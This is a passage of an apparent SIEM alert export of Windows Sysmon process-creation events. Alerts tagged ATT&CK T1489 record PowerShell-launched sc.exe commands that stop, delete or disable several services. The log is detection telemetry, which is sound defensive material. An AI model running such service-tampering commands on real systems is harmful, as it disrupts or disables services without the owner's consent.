MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.674598600Z"",""eventRecordID"":""3416"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.672\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010e63f2e00}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.672"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010e63f2e00}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.063",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.643 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010503e2e00} +ProcessId: 7248 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.646651600Z"",""eventRecordID"":""3414"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.643\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010503e2e00}\r\nProcessId: 7248\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.643"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010503e2e00}"",""processId"":""7248"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.028",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.627 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00107e3d2e00} +ProcessId: 7212 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.630436900Z"",""eventRecordID"":""3413"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.627\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00107e3d2e00}\r\nProcessId: 7212\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.627"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00107e3d2e00}"",""processId"":""7212"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.963",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:51:59.572 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00106e3a2e00} +ProcessId: 4312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.574761600Z"",""eventRecordID"":""3410"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.572\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00106e3a2e00}\r\nProcessId: 4312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.572"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00106e3a2e00}"",""processId"":""4312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.713",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.514 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00105b362e00} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.517240500Z"",""eventRecordID"":""3407"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.514\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00105b362e00}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.514"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00105b362e00}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.701",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.493 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00104f352e00} +ProcessId: 8132 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.496815300Z"",""eventRecordID"":""3406"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.493\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00104f352e00}\r\nProcessId: 8132\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.493"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00104f352e00}"",""processId"":""8132"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.665",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.457 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001093332e00} +ProcessId: 5592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
